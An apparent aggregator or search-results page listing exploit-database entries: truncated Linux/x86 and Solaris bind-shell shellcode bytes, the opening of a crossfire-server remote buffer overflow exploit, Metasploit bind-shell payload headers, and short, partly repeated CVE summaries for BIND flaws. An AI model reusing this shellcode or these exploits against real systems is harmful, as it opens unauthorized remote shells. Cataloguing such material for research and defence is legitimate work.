linux/x86 Password Authentication portbind Shellcode 166 bytes

Exploit for linux/x86 platform in category shellcode ============================================================== linux/x86 Password Authentication portbind Shellcode 166 bytes ============================================================== / linux-x86-authportbind.c - AUTH portbind shellcode 16...

crossfire-server 1.9.0 - 'SetUp()' Remote Buffer Overflow

// crossfire-server include include include include include include include include define PORT 13327 // default port define SCPORT 33333 // default shellcode port define SCHOST "127.0.0.1" // default shellcode host unsigned char sccb = // izik's...

linux/x86 TCP Proxy Shellcode 236 bytes

Exploit for linux/x86 platform in category shellcode ======================================= linux/x86 TCP Proxy Shellcode 236 bytes ======================================= // proxylib.c - is located at http://www.milw0rm.com/id.php?id=1476 /str0ke / hey all.. this is my attempt at a very small...

CVE-2006-0527

BIND 4 BIND4 and BIND 8 BIND8, if used as a target forwarder, allows remote attackers to gain privileged access via a "Kashpureff-style DNS cache corruption" attack...

CVE-2006-0527

BIND 4 BIND4 and BIND 8 BIND8, if used as a target forwarder, allows remote attackers to gain privileged access via a "Kashpureff-style DNS cache corruption" attack...

Memory corruption

BIND 4 BIND4 and BIND 8 BIND8, if used as a target forwarder, allows remote attackers to gain privileged access via a "Kashpureff-style DNS cache corruption" attack...

CVE-2006-0527

CVE-2006-0527 affects BIND 4 and BIND 8 when used as a target forwarder; it describes a Kashpureff-style DNS cache corruption that allows remote attackers to gain privileged access. The connected sources corroborate the same vulnerability description across NVD, CVE records, and repository entrie...

linux/x86 Bind /bin/sh to 31337/tcp 80 bytes

linux/x86 Bind /bin/sh to 31337/tcp 80 bytes. Shellcode exploit for linx86 platform / linux/x86 bind '/bin/sh' to 31337/tcp - 80 bytes - izik / char shellcode = "\x6a\x66" // push $0x66 "\x58" // pop %eax "\x99" // cltd "\x6a\x01" // push $0x1 "\x5b" // pop %ebx "\x52" // push %edx "\x53" // push...

linux/x86 Bind /bin/sh to 31337/tcp + fork 98 bytes

linux/x86 Bind /bin/sh to 31337/tcp + fork 98 bytes. Shellcode exploit for linx86 platform / linux/x86 bind '/bin/sh' to 31337/tcp + fork - 98 bytes - izik / char shellcode = "\x6a\x66" // push $0x66 "\x58" // pop %eax "\x99" // cltd "\x6a\x01" // push $0x1 "\x5b" // pop %ebx "\x52" // push %edx...

linux/x86 Bind /bin/sh to 31337/tcp 80 bytes

No description provided by source. / linux/x86 bind '/bin/sh' to 31337/tcp - 80 bytes - izik [email protected] / char shellcode = "\x6a\x66" // push $0x66 "\x58" // pop %eax "\x99" // cltd "\x6a\x01" // push $0x1 "\x5b" // pop %ebx "\x52" // push %edx "\x53" // push %ebx "\x6a\x02" // push $0x2 // /...

linux/x86 Bind /bin/sh to 31337/tcp + fork() 98 bytes

No description provided by source. / linux/x86 bind '/bin/sh' to 31337/tcp + fork - 98 bytes - izik [email protected] / char shellcode = "\x6a\x66" // push $0x66 "\x58" // pop %eax "\x99" // cltd "\x6a\x01" // push $0x1 "\x5b" // pop %ebx "\x52" // push %edx "\x53" // push %ebx "\x6a\x02" // push $0...

linux/x86 Bind /bin/sh to 31337/tcp 80 bytes

Exploit for linux/x86 platform in category shellcode ============================================ linux/x86 Bind /bin/sh to 31337/tcp 80 bytes ============================================ / linux/x86 bind '/bin/sh' to 31337/tcp - 80 bytes - izik / char shellcode = "\x6a\x66" // push $0x66 "\x58" ...

linux/x86 Bind /bin/sh to 31337/tcp + fork() 98 bytes

Exploit for linux/x86 platform in category shellcode ===================================================== linux/x86 Bind /bin/sh to 31337/tcp + fork 98 bytes ===================================================== / linux/x86 bind '/bin/sh' to 31337/tcp + fork - 98 bytes - izik / char shellcode =...

Unix Command Shell, Bind TCP (inetd)

Listen for a connection and spawn a command shell persistent This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 487 include Msf::Payload::Single include...

solaris/sparc portbind (port 6666) 240 bytes

No description provided by source. / [email protected] portbind shellcode full description of how it was done and defines at http://www.telegenetic.net/sparc-shellcode.htm / char shellcode= "\x9A\x1A\x40\x09" / xor %o1, %o1, %o5 / "\x90\x10\x20\x02" / mov PFINET, %o0 / "\x92\x10\x20\x02" / mo...

BSDi Command Shell, Bind TCP Stager

Spawn a command shell staged. Listen for a connection This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework BindTcp ------- BSD bind TCP stager. module MetasploitModule CachedSize = 69 include Msf::Payload::Stager def...

CVE-2005-0033

Buffer overflow in the code for recursion and glue fetching in BIND 8.4.4 and 8.4.5 allows remote attackers to cause a denial of service crash via queries that trigger the overflow in the qusedns array that tracks nameservers and addresses...

CVE-2005-0034

An "incorrect assumption" in the authvalidated validator function in BIND 9.3.0, when DNSSEC is enabled, allows remote attackers to cause a denial of service named server exit via crafted DNS packets that cause an internal consistency test self-check to fail...

CVE-2005-0033

Buffer overflow in the code for recursion and glue fetching in BIND 8.4.4 and 8.4.5 allows remote attackers to cause a denial of service crash via queries that trigger the overflow in the qusedns array that tracks nameservers and addresses...

DEBIAN-CVE-2005-0034

An "incorrect assumption" in the authvalidated validator function in BIND 9.3.0, when DNSSEC is enabled, allows remote attackers to cause a denial of service named server exit via crafted DNS packets that cause an internal consistency test self-check to fail...